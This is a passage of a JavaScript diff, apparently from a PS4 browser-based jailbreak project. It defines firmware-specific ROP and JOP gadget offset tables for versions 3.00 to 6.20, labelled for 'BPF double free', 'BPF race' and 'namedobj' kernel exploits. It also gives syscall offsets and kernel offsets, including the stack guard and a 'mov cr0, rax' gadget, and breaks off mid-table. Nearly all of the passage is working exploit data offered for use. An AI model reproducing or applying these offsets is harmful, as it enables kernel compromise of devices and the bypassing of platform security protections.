'ret2userland': 0x00009E9A, // 3.00-3.11 + 'add rsp, 0x28': 0x00004228, // 3.00-3.11 + 'mov rax, [rdi]': 0x0006D5E0, // 3.00-3.11 + 'mov [rsi], rdx': 0x00E04C68, // 3.00-3.11 + 'add rdi, rax; mov rax, rdi': 0x00E48C57, // 3.00-3.11 + + // BPF double free JOP kdumper + 'mov rsi, rax; jmp rcx': 0x00101290, // 3.00-3.11 + + // JOP gadgets for BPF double free kexploit + 'jop1': 0x0043E21D, // 3.00-3.11 + 'jop2': 0x0113EFB1, // 3.00-3.11 + 'jop3': 0x00CBD8EB, // 3.00-3.11 + 'jop4': 0x011399F0, // 3.00-3.11 + 'jop_mov rbp, rsp': 0x009ABC21, // 3.00-3.11 + 'jop6': 0x003FF95D, // 3.00-3.11 + + // Functions + 'longjmp': 0x00000D98, // 3.00-3.11 + 'createThread': 0x001C8B90, // 3.00-3.11 + }; +} else if (fwFromUA === 3.15) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x00000062, // 3.00-3.70 + 'jmp rax': 0x00000092, // 3.00-3.70 + 'ep': 0x000000BD, // 3.00-3.70 + 'pop rbp': 0x000000C6, // 3.00-3.70 + 'mov [rdi], rax': 0x000B62D4, // 3.15 + 'pop r8': 0x0030434D, // 3.15 + 'pop rax': 0x0000F43B, // 3.15 + 'mov rax, rdi': 0x00003193, // 3.15 + 'mov rax, [rax]': 0x0002D372, // 3.15 + 'pop rsi': 0x001935D5, // 3.15 + 'pop rdi': 0x001938D8, // 3.15 + 'pop rcx': 0x00247763, // 3.15 + 'pop rsp': 0x00064C05, // 3.15 + 'mov [rdi], rsi': 0x002B5100, // 3.15 + 'pop rdx': 0x00065A22, // 3.15 + 'pop r9': 0x00A4454F, // 3.15 + 'jop': 0x0106AA64, // 3.15 + 'infloop': 0x000115D6, // 3.15 + + // kROP gadgets + 'mov [rdx], rax': 0x003D3A3D, // 3.15 + 'add rax, rcx': 0x0004C826, // 3.15 + 'mov rdx, rax': 0x00E24F52, // 3.15 + 'mov rax, rdx': 0x0019A1E1, // 3.15 + 'jmp rdx': 0x00018E47, // 3.15 + + // namedobj kexploit + 'push rax; jmp rcx': 0x002D5220, // 3.15 + + // BPF race kexploit + 'leave': 0x00023D3B, // 3.15 + + // BPF race old kexploit + 'leave_1': 0x0, /* CHECKTHIS */ + + // BPF double free kexploit + 'ret2userland': 0x00009D9A, // 3.15 + 'add rsp, 0x28': 0x00004128, // 3.15 + 'mov rax, [rdi]': 0x0005D910, // 3.15 + 'mov [rsi], rdx': 0x00D6C858, // 3.15 + 'add rdi, rax; mov rax, rdi': 0x00DB0847, // 3.15 + + // BPF double free JOP kdumper + 'mov rsi, rax; jmp rcx': 0x000C85C0, // 3.15 + + // JOP gadgets for BPF double free kexploit + 'jop1': 0x0040438D, // 3.15 + 'jop2': 0x01070021, // 3.15 + 'jop3': 0x00C254DB, // 3.15 + 'jop4': 0x0106AA60, // 3.15 + 'jop_mov rbp, rsp': 0x00914271, // 3.15 + 'jop6': 0x003C5ACD, // 3.15 + + // Functions + 'longjmp': 0x00000CE8, // 3.15 + 'createThread': 0x0018F260, // 3.15 + }; +} else if (fwFromUA === 3.50) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x00000062, // 3.00-3.70 + 'jmp rax': 0x00000092, // 3.00-3.70 + 'ep': 0x000000BD, // 3.00-3.70 + 'pop rbp': 0x000000C6, // 3.00-3.70 + 'mov [rdi], rax': 0x0011FC37, // 3.50-3.70 + 'pop r8': 0x004C12ED, // 3.50 + 'pop rax': 0x0001C6AB, // 3.50-3.70 + 'mov rax, rdi': 0x000057C3, // 3.50-3.70 + 'mov rax, [rax]': 0x0004ADD2, // 3.50-3.70 + 'pop rsi': 0x000B9EBB, // 3.50-3.70 + 'pop rdi': 0x00113991, // 3.50-3.70 + 'pop rcx': 0x003CA71B, // 3.50-3.70 + 'pop rsp': 0x00376850, // 3.50-3.70 + 'mov [rdi], rsi': 0x00458400, // 3.50 + 'pop rdx': 0x00001AFA, // 3.50-3.70 + 'pop r9': 0x00EE09BF, // 3.50 + 'jop': 0x0086D424, // 3.50 + 'infloop': 0x00057F2F, // 3.50-3.70 + + // kROP gadgets + 'mov [rdx], rax': 0x005DC36D, // 3.50 + 'add rax, rcx': 0x000879D7, // 3.50-3.70 + 'mov rdx, rax': 0x0000B45C, // 3.50-3.70 + 'mov rax, rdx': 0x002E19F1, // 3.50-3.70 + 'jmp rdx': 0x0002A4B2, // 3.50-3.70 + + // namedobj kexploit + 'push rax; jmp rcx': 0x004853E0, // 3.50 + + // BPF race kexploit + 'leave': 0x0000AE00, // 3.50-3.70 + + // BPF race old kexploit + 'leave_1': 0x00003E8A, // 3.50-3.70 + + // BPF double free kexploit + 'ret2userland': 0x0000FC7A, // 3.50-3.70 + 'add rsp, 0x28': 0x00006AF2, // 3.50-3.70 + 'mov rax, [rdi]': 0x000A0450, // 3.50-3.70 + 'mov [rsi], rdx': 0x011EC363, // 3.50 + 'add rdi, rax; mov rax, rdi': 0x012B4808, // 3.50 + + // BPF double free JOP kdumper + 'mov rsi, rax; jmp rcx': 0x001AC260, // 3.50-3.70 + + // JOP gadgets for BPF double free kexploit + 'jop1': 0x0061A79D, // 3.50 + 'jop2': 0x00886391, // 3.50 + 'jop3': 0x01120ADB, // 3.50 + 'jop4': 0x0086D420, // 3.50 + 'jop_mov rbp, rsp': 0x00D471F1, // 3.50 + 'jop6': 0x005CB8BD, // 3.50 + + // Functions + 'longjmp': 0x00000D98, // 3.50-3.70 + 'createThread': 0x002D1CB0, // 3.50-3.70 + }; +} else if (fwFromUA >= 3.55 && fwFromUA <= 3.70) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x00000062, // 3.00-3.70 + 'jmp rax': 0x00000092, // 3.00-3.70 + 'ep': 0x000000BD, // 3.00-3.70 + 'pop rbp': 0x000000C6, // 3.00-3.70 + 'mov [rdi], rax': 0x0011FC37, // 3.50-3.70 + 'pop r8': 0x004C13BD, // 3.55-3.70 + 'pop rax': 0x0001C6AB, // 3.50-3.70 + 'mov rax, rdi': 0x000057C3, // 3.50-3.70 + 'mov rax, [rax]': 0x0004ADD2, // 3.50-3.70 + 'pop rsi': 0x000B9EBB, // 3.50-3.70 + 'pop rdi': 0x00113991, // 3.50-3.70 + 'pop rcx': 0x003CA71B, // 3.50-3.70 + 'pop rsp': 0x00376850, // 3.50-3.70 + 'mov [rdi], rsi': 0x004584D0, // 3.55-3.70 + 'pop rdx': 0x00001AFA, // 3.50-3.70 + 'pop r9': 0x00EE0A8F, // 3.55-3.70 + 'jop': 0x0086D4F4, // 3.55-3.70 + 'infloop': 0x00057F2F, // 3.50-3.70 + + // kROP gadgets + 'mov [rdx], rax': 0x005DC43D, // 3.55-3.70 + 'add rax, rcx': 0x000879D7, // 3.50-3.70 + 'mov rdx, rax': 0x0000B45C, // 3.50-3.70 + 'mov rax, rdx': 0x002E19F1, // 3.50-3.70 + 'jmp rdx': 0x0002A4B2, // 3.50-3.70 + + // namedobj kexploit + 'push rax; jmp rcx': 0x004854B0, // 3.55-3.70 + + // BPF race kexploit + 'leave': 0x0000AE00, // 3.50-3.70 + + // BPF race old kexploit + 'leave_1': 0x00003E8A, // 3.50-3.70 + + // BPF double free kexploit + 'ret2userland': 0x0000FC7A, // 3.50-3.70 + 'add rsp, 0x28': 0x00006AF2, // 3.50-3.70 + 'mov rax, [rdi]': 0x000A0450, // 3.50-3.70 + 'mov [rsi], rdx': 0x011EC433, // 3.55-3.70 + 'add rdi, rax; mov rax, rdi': 0x012B48D8, // 3.55-3.70 + + // BPF double free JOP kdumper + 'mov rsi, rax; jmp rcx': 0x001AC260, // 3.50-3.70 + + // JOP gadgets for BPF double free kexploit + 'jop1': 0x0061A86D, // 3.55-3.70 + 'jop2': 0x00886461, // 3.55-3.70 + 'jop3': 0x01120BAB, // 3.55-3.70 + 'jop4': 0x0086D4F0, // 3.55-3.70 + 'jop_mov rbp, rsp': 0x00D472C1, // 3.55-3.70 + 'jop6': 0x005CB98D, // 3.55-3.70 + + // Functions + 'longjmp': 0x00000D98, // 3.50-3.70 + 'createThread': 0x002D1CB0, // 3.50-3.70 + }; +} else if (fwFromUA >= 4.00 && fwFromUA <= 4.05) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x000000C8, // 4.00-4.07 + 'jmp rax': 0x00000093, // 4.00-4.07 + 'ep': 0x000000BE, // 4.00-4.07 + 'pop rbp': 0x000000C7, // 4.00-4.07 + 'mov [rdi], rax': 0x0011ADD7, // 4.00-4.07 + 'pop r8': 0x004A3B0D, // 4.00-4.07 + 'pop rax': 0x0001D70B, // 4.00-4.07 + 'mov rax, rdi': 0x00005863, // 4.00-4.07 + 'mov rax, [rax]': 0x000FD88D, // 4.00-4.07 + 'pop rsi': 0x000A459E, // 4.00-4.07 + 'pop rdi': 0x0010F1C1, // 4.00-4.07 + 'pop rcx': 0x004C92F5, // 4.00-4.07 + 'pop rsp': 0x0020AEB0, // 4.00-4.07 + 'mov [rdi], rsi': 0x0043CF70, // 4.00-4.07 + 'pop rdx': 0x000D6660, // 4.00-4.07 + 'pop r9': 0x00EB5F8F, // 4.00-4.07 + 'jop': 0x00852624, // 4.00-4.07 + 'infloop': 0x00045A11, // 4.00-4.07 + + // kROP gadgets + 'mov [rdx], rax': 0x005BB74D, // 4.00-4.07 + 'add rax, rcx': 0x00086F06, // 4.00-4.07 + 'mov rdx, rax': 0x0000B44A, // 4.00-4.07 + 'mov rax, rdx': 0x000DAB96, // 4.00-4.07 + 'jmp rdx': 0x0027A198, // 4.00-4.07 + + // namedobj kexploit + 'push rax; jmp rcx': 0x00469B80, // 4.00-4.07 + + // BPF race kexploit + 'leave': 0x001B7D63, // 4.00-4.07 + + // BPF race old kexploit + 'leave_1': 0x00003F1A, // 4.00-4.07 + + // BPF double free kexploit + 'ret2userland': 0x0000FC0A, // 4.00-4.07 + 'add rsp, 0x28': 0x00006B72, // 4.00-4.07 + 'mov rax, [rdi]': 0x0009E490, // 4.00-4.07 + 'mov [rsi], rdx': 0x011C1703, // 4.00-4.05 + 'add rdi, rax; mov rax, rdi': 0x01289BA8, // 4.00-4.05 + + // BPF double free JOP kdumper + 'mov rsi, rax; jmp rcx': 0x001A7B90, // 4.00-4.07 + + // JOP gadgets for BPF double free kexploit + 'jop1': 0x005FA63D, // 4.00-4.07 + 'jop2': 0x0086BAC1, // 4.00-4.07 + 'jop3': 0x010F5E7B, // 4.00-4.07 + 'jop4': 0x00852620, // 4.00-4.07 + 'jop_mov rbp, rsp': 0x002F88E4, // 4.00-4.07 + 'jop6': 0x005AAD1D, // 4.00-4.07 + + // Functions + 'longjmp': 0x00000DE0, // 4.00-4.07 + 'createThread': 0x002C48C0, // 4.00-4.07 + }; +} else if (fwFromUA >= 4.06 && fwFromUA <= 4.07) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x000000C8, // 4.00-4.07 + 'jmp rax': 0x00000093, // 4.00-4.07 + 'ep': 0x000000BE, // 4.00-4.07 + 'pop rbp': 0x000000C7, // 4.00-4.07 + 'mov [rdi], rax': 0x0011ADD7, // 4.00-4.07 + 'pop r8': 0x004A3B0D, // 4.00-4.07 + 'pop rax': 0x0001D70B, // 4.00-4.07 + 'mov rax, rdi': 0x00005863, // 4.00-4.07 + 'mov rax, [rax]': 0x000FD88D, // 4.00-4.07 + 'pop rsi': 0x000A459E, // 4.00-4.07 + 'pop rdi': 0x0010F1C1, // 4.00-4.07 + 'pop rcx': 0x004C92F5, // 4.00-4.07 + 'pop rsp': 0x0020AEB0, // 4.00-4.07 + 'mov [rdi], rsi': 0x0043CF70, // 4.00-4.07 + 'pop rdx': 0x000D6660, // 4.00-4.07 + 'pop r9': 0x00EB5F8F, // 4.00-4.07 + 'jop': 0x00852624, // 4.00-4.07 + 'infloop': 0x00045A11, // 4.00-4.07 + + // kROP gadgets + 'mov [rdx], rax': 0x005BB74D, // 4.00-4.07 + 'add rax, rcx': 0x00086F06, // 4.00-4.07 + 'mov rdx, rax': 0x0000B44A, // 4.00-4.07 + 'mov rax, rdx': 0x000DAB96, // 4.00-4.07 + 'jmp rdx': 0x0027A198, // 4.00-4.07 + + // namedobj kexploit + 'push rax; jmp rcx': 0x00469B80, // 4.00-4.07 + + // BPF race kexploit + 'leave': 0x001B7D63, // 4.00-4.07 + + // BPF race old kexploit + 'leave_1': 0x00003F1A, // 4.00-4.07 + + // BPF double free kexploit + 'ret2userland': 0x0000FC0A, // 4.00-4.07 + 'add rsp, 0x28': 0x00006B72, // 4.00-4.07 + 'mov rax, [rdi]': 0x0009E490, // 4.00-4.07 + 'mov [rsi], rdx': 0x011C3983, // 4.06-4.07 + 'add rdi, rax; mov rax, rdi': 0x012A14E8, // 4.06-4.07 + + // BPF double free JOP kdumper + 'mov rsi, rax; jmp rcx': 0x001A7B90, // 4.00-4.07 + + // JOP gadgets for BPF double free kexploit + 'jop1': 0x005FA63D, // 4.00-4.07 + 'jop2': 0x0086BAC1, // 4.00-4.07 + 'jop3': 0x010F5E7B, // 4.00-4.07 + 'jop4': 0x00852620, // 4.00-4.07 + 'jop_mov rbp, rsp': 0x002F88E4, // 4.00-4.07 + 'jop6': 0x005AAD1D, // 4.00-4.07 + + // Functions + 'longjmp': 0x00000DE0, // 4.00-4.07 + 'createThread': 0x002C48C0, // 4.00-4.07 + }; +} else if (fwFromUA >= 4.50 && fwFromUA <= 4.74) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x0000003C, // 4.50-6.20 + 'jmp rax': 0x00000082, // 4.50-5.56 + 'ep': 0x000000AD, // 4.50-5.56 + 'pop rbp': 0x000000B6, // 4.50-6.20 + 'mov [rdi], rax': 0x00003FBA, // 4.50-4.74 + 'pop r8': 0x0000CC42, // 4.50-4.74 + 'pop rax': 0x0000CC43, // 4.50-4.74 + 'mov rax, rdi': 0x0000E84E, // 4.50-4.74 + 'mov rax, [rax]': 0x000130A3, // 4.50-4.74 + 'pop rsi': 0x0007B1EE, // 4.50-4.74 + 'pop rdi': 0x0007B23D, // 4.50-4.74 + 'pop rcx': 0x00271DE3, // 4.50-4.74 + 'pop rsp': 0x0027A450, // 4.50-4.74 + 'mov [rdi], rsi': 0x0039CF70, // 4.50-4.74 + 'pop rdx': 0x00565838, // 4.50-4.74 + 'pop r9': 0x0078BA1F, // 4.50-4.74 + 'jop': 0x01277350, // 4.50-4.74 + 'infloop': 0x012C4009, // 4.50-4.74 + + // kROP gadgets + 'mov [rdx], rax': 0x009B5BE3, // 4.50-4.74 + 'add rax, rcx': 0x0084D04D, // 4.50-4.74 + 'mov rdx, rax': 0x00012A16, // 4.50-4.74 + 'mov rax, rdx': 0x001E4EDE, // 4.50-4.74 + 'jmp rdx': 0x001517C7, // 4.50-4.74 + + // BPF race kexploit + 'leave': 0x0003EBD0, // 4.50-4.74 + + // BPF double free kexploit + 'ret2userland': 0x0008905C, // 4.50-4.74 + 'add rsp, 0x28': 0x000028A2, // 4.50-4.74 + 'mov rax, [rdi]': 0x0013A220, // 4.50-4.74 + 'mov [rsi], rdx': 0x01574006, // 4.50-4.74 + 'add rdi, rax; mov rax, rdi': 0x0141D1CD, // 4.50-4.74 + + // BPF double free JOP kdumper + 'mov rsi, rax; jmp rcx': 0x00018C10, // 4.50-4.74 + + // JOP gadgets for BPF double free kexploit + 'jop1': 0x005D365D, // 4.50-4.74 + 'jop2': 0x007B0E65, // 4.50-4.74 + 'jop3': 0x0142BDBB, // 4.50-4.74 + 'jop4': 0x00637AC4, // 4.50-4.74 + 'jop_mov rbp, rsp': 0x001B5B7A, // 4.50-4.74 + 'jop6': 0x000F391D, // 4.50-4.74 + + // Functions + 'longjmp': 0x00001458, // 4.50-4.74 + 'createThread': 0x0116ED40, // 4.50-4.74 + }; +} else if (fwFromUA >= 5.00 && fwFromUA <= 5.01) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x0000003C, // 4.50-6.20 + 'jmp rax': 0x00000082, // 4.50-5.56 + 'ep': 0x000000AD, // 4.50-5.56 + 'pop rbp': 0x000000B6, // 4.50-6.20 + 'mov [rdi], rax': 0x0014536B, // 5.00-5.01 + 'pop r8': 0x000179C5, // 5.00-5.07 + 'pop rax': 0x000043F5, // 5.00-5.07 + 'mov rax, rdi': 0x000058D0, // 5.00-5.07 + 'mov rax, [rax]': 0x0006C83A, // 5.00-5.07 + 'pop rsi': 0x0008F38A, // 5.00-5.07 + 'pop rdi': 0x00038DBA, // 5.00-5.07 + 'pop rcx': 0x00052E59, // 5.00-5.07 + 'pop rsp': 0x0001E687, // 5.00-5.07 + 'mov [rdi], rsi': 0x00023AC2, // 5.00-5.07 + 'pop rdx': 0x000DEDC2, // 5.00-5.01 + 'pop r9': 0x00BB30CF, // 5.00-5.01 + 'jop': 0x000C37D0, // 5.00-5.07 + 'infloop': 0x0000D53B, // 5.00-5.07 + + // kROP gadgets + 'mov [rdx], rax': 0x001F13DB, // 5.00-5.01 + 'add rax, rcx': 0x000156DB, // 5.00-5.07 + 'mov rdx, rax': 0x00353A71, // 5.00-5.01 + 'mov rax, rdx': 0x001CEE60, // 5.00-5.01 + 'jmp rdx': 0x0000E3D0, // 5.00-5.07 + + // BPF double free kexploit + 'ret2userland': 0x0005CDB9, // 5.00-5.07 + 'add rsp, 0x28': 0x00004C2E, // 5.00-5.07 + 'mov rax, [rdi]': 0x00046EF9, // 5.00-5.07 + 'mov [rsi], rdx': 0x00A643CA, // 5.00-5.01 + 'add rdi, rax; mov rax, rdi': 0x0055566F, // 5.00-5.01 + + // BPF double free JOP kdumper + 'mov rsi, rax; jmp rcx': 0x0000DEE0, // 5.00-5.07 + + // JOP gadgets for BPF double free kexploit + 'jop1': 0x012A184D, // 5.00-5.01 + 'jop2': 0x006EF2E5, // 5.00-5.01 + 'jop3': 0x015CA29B, // 5.00-5.01 + 'jop4': 0x012846B4, // 5.00-5.01 + 'jop_mov rbp, rsp': 0x000F094A, // 5.00-5.07 + 'jop6': 0x002728A1, // 5.00-5.01 + + 'longjmp': 0x000014E8, // 5.00-5.07 + 'createThread': 0x00779190, // 5.00-5.01 + }; +} else if (fwFromUA >= 5.03 && fwFromUA <= 5.07) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x0000003C, // 4.50-6.20 + 'jmp rax': 0x00000082, // 4.50-5.56 + 'ep': 0x000000AD, // 4.50-5.56 + 'pop rbp': 0x000000B6, // 4.50-6.20 + 'mov [rdi], rax': 0x0014536B, // 5.03-5.07 + 'pop r8': 0x000179C5, // 5.00-5.07 + 'pop rax': 0x000043F5, // 5.00-5.07 + 'mov rax, rdi': 0x000058D0, // 5.00-5.07 + 'mov rax, [rax]': 0x0006C83A, // 5.00-5.07 + 'pop rsi': 0x0008F38A, // 5.00-5.07 + 'pop rdi': 0x00038DBA, // 5.00-5.07 + 'pop rcx': 0x00052E59, // 5.00-5.07 + 'pop rsp': 0x0001E687, // 5.00-5.07 + 'mov [rdi], rsi': 0x00023AC2, // 5.00-5.07 + 'pop rdx': 0x001BE024, // 5.03-5.07 + 'pop r9': 0x00BB320F, // 5.03-5.07 + 'jop': 0x000C37D0, // 5.00-5.07 + 'infloop': 0x0000D53B, // 5.00-5.07 + + // kROP gadgets + 'mov [rdx], rax': 0x001F149B, // 5.03-5.07 + 'add rax, rcx': 0x000156DB, // 5.00-5.07 + 'mov rdx, rax': 0x00353B31, // 5.03-5.07 + 'mov rax, rdx': 0x001CEF20, // 5.03-5.07 + 'jmp rdx': 0x0000E3D0, // 5.00-5.07 + + // BPF double free kexploit + 'ret2userland': 0x0005CDB9, // 5.00-5.07 + 'add rsp, 0x28': 0x00004C2E, // 5.00-5.07 + 'mov rax, [rdi]': 0x00046EF9, // 5.00-5.07 + 'mov [rsi], rdx': 0x00A6450A, // 5.03-5.07 + 'add rdi, rax; mov rax, rdi': 0x005557DF, // 5.03-5.07 + + // BPF double free JOP kdumper + 'mov rsi, rax; jmp rcx': 0x0000DEE0, // 5.00-5.07 + + // JOP gadgets for BPF double free kexploit + 'jop1': 0x012A19CD, // 5.03-5.07 + 'jop2': 0x006EF4E5, // 5.03-5.07 + 'jop3': 0x015CA41B, // 5.03-5.07 + 'jop4': 0x01284834, // 5.03-5.07 + 'jop_mov rbp, rsp': 0x000F094A, // 5.00-5.07 + 'jop6': 0x00272961, // 5.03-5.07 + + 'longjmp': 0x000014E8, // 5.00-5.07 + 'createThread': 0x00779390, // 5.03-5.07 + }; +} else if (fwFromUA === 5.50) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x0000003C, // 4.50-6.20 + 'jmp rax': 0x00000082, // 4.50-5.56 + 'ep': 0x000000AD, // 4.50-5.56 + 'pop rbp': 0x000000B6, // 4.50-6.20 + 'mov [rdi], rax': 0x003BD04B, // 5.50-5.56 + 'pop r8': 0x000188A0, // 5.50-5.56 + 'pop rax': 0x00004575, // 5.50-5.56 + 'mov rax, rdi': 0x00005AD0, // 5.50-5.56 + 'mov rax, [rax]': 0x000F1ABA, // 5.50-5.56 + 'pop rsi': 0x00091D11, // 5.50-5.56 + 'pop rdi': 0x0003A5DF, // 5.50-5.56 + 'pop rcx': 0x00029451, // 5.50-5.56 + 'pop rsp': 0x0001F4AD, // 5.50-5.56 + 'mov [rdi], rsi': 0x00024CE2, // 5.50-5.56 + 'pop rdx': 0x0010AC52, // 5.50 + 'pop r9': 0x0146FF4F, // 5.50 + 'jop': 0x000C6A20, // 5.50-5.56 + 'infloop': 0x00003B1F, // 5.50-5.56 + }; +} else if (fwFromUA >= 5.53 && fwFromUA <= 5.56) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x0000003C, // 4.50-6.20 + 'jmp rax': 0x00000082, // 4.50-5.56 + 'ep': 0x000000AD, // 4.50-5.56 + 'pop rbp': 0x000000B6, // 4.50-6.20 + 'mov [rdi], rax': 0x000BEF5C, // 5.50-5.56 + 'pop r8': 0x000188A5, // 5.50-5.56 + 'pop rax': 0x00004575, // 5.50-5.56 + 'mov rax, rdi': 0x00005AD0, // 5.50-5.56 + 'mov rax, [rax]': 0x000F1ABA, // 5.50-5.56 + 'pop rsi': 0x00091D11, // 5.50-5.56 + 'pop rdi': 0x0003A5DF, // 5.50-5.56 + 'pop rcx': 0x00029451, // 5.50-5.56 + 'pop rsp': 0x0001F4AD, // 5.50-5.56 + 'mov [rdi], rsi': 0x00024CE2, // 5.50-5.56 + 'pop rdx': 0x000BDD06, // 5.53-5.56 + 'pop r9': 0x0146FF6F, // 5.53-5.56 + 'jop': 0x000C6A20, // 5.50-5.56 + 'infloop': 0x00003B1F, // 5.50-5.56 + }; +} else if (fwFromUA >= 6.00 && fwFromUA <= 6.02) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x0000003C, // 4.50-6.20 + 'infloop': 0x00013AAE, // 6.00-6.20 + + 'pop rdi': 0x00AC95F2, // 6.00-6.20 + 'pop rsi': 0x000756CB, // 6.00-6.20 + 'pop rdx': 0x002A9BA2, // 6.00-6.02 + 'pop rcx': 0x000348D3, // 6.00-6.20 + 'pop r8': 0x00079211, // 6.00-6.20 + 'pop r9': 0x000CDB41, // 6.00-6.20 + 'pop rax': 0x00075BDF, // 6.00-6.20 + 'pop rbp': 0x000000B6, // 4.50-6.20 + 'pop rsp': 0x00075D9A, // 6.00-6.20 + + 'mov rax, rdi': 0x00008CD0, // 6.00-6.20 + 'mov rdx, rdi': 0x006271EE, // 6.00-6.02 + 'mov rax, rdx': 0x0007BC20, // 6.00-6.20 + 'mov rax, [rax]': 0x0002DC22, // 6.00-6.20 + 'mov [rdi], rsi': 0x00034EF0, // 6.00-6.20 + 'mov [rdi], rax': 0x0001FB49, // 6.00-6.20 + 'mov [rax], rdi': 0x01762997, // 6.00-6.02 + 'mov [rax], rsi': 0x0133138D, // 6.00-6.02 + 'mov rdx, [rcx]': 0x001848F4, // 6.00-6.20 + + 'add rax, rcx': 0x000C3F62, // 6.00-6.20 + 'add rax, rsi': 0x013F9523, // 6.00-6.02 + 'and rax, rcx': 0x00746F34, // 6.00-6.02 + + 'jmp rdi': 0x0000CEA5, // 6.00-6.20 + }; +} else if (fwFromUA === 6.20) { + gadget_cache = { + // Regular ROP Gadgets + 'ret': 0x0000003C, // 4.55-6.20 + 'infloop': 0x00013AAE, // 6.00-6.20 + + 'pop rdi': 0x00AC95F2, // 6.00-6.20 + 'pop rsi': 0x000756CB, // 6.00-6.20 + 'pop rdx': 0x002516B2, // 6.20 + 'pop rcx': 0x000348D3, // 6.00-6.20 + 'pop r8': 0x00079211, // 6.00-6.20 + 'pop r9': 0x000CDB41, // 6.00-6.20 + 'pop rax': 0x00075BDF, // 6.00-6.20 + 'pop rbp': 0x000000B6, // 4.55-6.20 + 'pop rsp': 0x00075D9A, // 6.00-6.20 + + 'mov rax, rdi': 0x00008CD0, // 6.00-6.20 + 'mov rdx, rdi': 0x006271FE, // 6.20 + 'mov rax, rdx': 0x0007BC20, // 6.00-6.20 + 'mov rax, [rax]': 0x0002DC22, // 6.00-6.20 + 'mov [rdi], rsi': 0x00034EF0, // 6.00-6.20 + 'mov [rdi], rax': 0x0001FB49, // 6.00-6.20 + 'mov [rax], rdi': 0x017629A7, // 6.20 + 'mov [rax], rsi': 0x0133139D, // 6.20 + 'mov rdx, [rcx]': 0x001848F4, // 6.00-6.20 + + 'add rax, rcx': 0x000C3F62, // 6.00-6.20 + 'add rax, rsi': 0x013F9533, // 6.20 + 'and rax, rcx': 0x00746F44, // 6.20 + + 'jmp rdi': 0x0000CEA5, // 6.00-6.20 + }; +} + +// Missing: <3.00 +// Only used for BPF double free kernel exploit +// These are based on the JOP functions selected in libSceWebKit2.sprx +var gadget_shifts = {}; +if (fwFromUA >= 3.00 && fwFromUA <= 4.07) { + gadget_shifts = { + 'stackshift_jop1': 0x00000018, // 3.00-4.07 + 'stackshift_jop6': 0x00000028, // 3.00-5.07 + 'jump_shift_jop1': 0x000003C0, // 3.00-4.07 + 'jump_shift_jop5': 0x00000410, // 3.00-4.07 + 'jump_shift_jop6': 0x00000358, // 3.00-4.07 + }; +} else if (fwFromUA >= 4.50 && fwFromUA <= 4.74) { + gadget_shifts = { + 'stackshift_jop1': 0x00000048, // 4.50-4.74 + 'stackshift_jop6': 0x00000028, // 3.50-5.07 + 'jump_shift_jop1': 0x000007D0, // 4.50-5.07 + 'jump_shift_jop5': 0x00000420, // 4.50-5.07 + 'jump_shift_jop6': 0x00000040, // 4.50-5.07 + }; +} else if (fwFromUA >= 5.00 && fwFromUA <= 5.07) { + gadget_shifts = { + 'stackshift_jop1': 0x00000058, // 5.00-5.07 + 'stackshift_jop6': 0x00000028, // 3.50-5.07 + 'jump_shift_jop1': 0x000007D0, // 4.50-5.07 + 'jump_shift_jop5': 0x00000420, // 4.50-5.07 + 'jump_shift_jop6': 0x00000040, // 4.50-5.07 + }; +} + +// Missing <=3.15 +// Only used for FWs <=4.07 +// These are from libkernel_web.sprx (libkernel.sprx on FWs <4.00) +var syscallMap = {}; +if (fwFromUA >= 3.50 && fwFromUA <= 3.70) { + syscallMap = { + 3: 0xAB20, // sys_read + 4: 0xAB40, // sys_write + 5: 0xAB60, // sys_open + 6: 0xAB80, // sys_close + 20: 0xACE0, // sys_getpid + 23: 0xAD40, // sys_setuid + 24: 0xAD60, // sys_getuid + 50: 0xDA10, // sys_setlogin + 54: 0xB0A0, // sys_ioctl + 73: 0xB1E0, // sys_munmap + 74: 0xB200, // sys_mprotect + 97: 0xB3E0, // sys_socket + 98: 0xB400, // sys_connect + 203: 0xB900, // sys_mlock + 324: 0xBD20, // sys_mlockall + 362: 0xBF40, // sys_kqueue + 363: 0xBF60, // sys_kevent + 477: 0xB1C0, // sys_mmap + 557: 0xCB80, // sys_namedobj_create + 558: 0xCBA0, // sys_namedobj_delete + 591: 0xCF80, // sys_dynlib_dlsym + 594: 0xCFE0, // sys_dynlib_load_prx + 601: 0xD0C0, // sys_mdbg_service + 632: 0xD4A0, // sys_thr_suspend_ucontext + 633: 0xD4C0, // sys_thr_resume_ucontext + 634: 0xD4E0, // sys_thr_get_ucontext + }; +} else if (fwFromUA >= 4.00 && fwFromUA <= 4.07) { + syscallMap = { + 3: 0x25F0, // sys_read + 4: 0x2730, // sys_write + 5: 0x2570, // sys_open + 6: 0x24D0, // sys_close + 20: 0x06F0, // sys_getpid + 23: 0x0710, // sys_setuid + 24: 0x0730, // sys_getuid + 50: 0x0640, // sys_setlogin + 54: 0x0970, // sys_ioctl + 73: 0x09F0, // sys_munmap + 74: 0x0A10, // sys_mprotect + 97: 0x0B70, // sys_socket + 98: 0x24F0, // sys_connect + 203: 0x1030, // sys_mlock + 324: 0x1230, // sys_mlockall + 362: 0x1390, // sys_kqueue + 363: 0x13B0, // sys_kevent + 477: 0x27B0, // sys_mmap + 557: 0x1AF0, // sys_namedobj_create + 558: 0x1B10, // sys_namedobj_delete + 591: 0x1D50, // sys_dynlib_dlsym + 594: 0x1DB0, // sys_dynlib_load_prx + 601: 0x1E70, // sys_mdbg_service + 632: 0x21D0, // sys_thr_suspend_ucontext + 633: 0x21F0, // sys_thr_resume_ucontext + 634: 0x2210, // sys_thr_get_ucontext + }; +} + +// Missing: <=3.70 and all devkits +// These are from the decrypted/dumped kernel +var kernel_offsets = {}; +if (fwFromUA === 3.50) { + kernel_offsets = { + '_vn_lock_break_slide': 0x00242BA6, // 3.50 + '__stack_chk_guard': 0x0242AD10, // 3.50-3.55 + 'kqueue_close_slide': 0x0017BB02, // 3.50 + 'bpf_slide': 0x0024BC63, // 3.50 + 'jmp [rsi]': 0x0008AEEA, // 3.50 + 'cpu_setregs': 0x003A6A40, // 3.50 + 'mov cr0, rax': 0x003A6A49, // 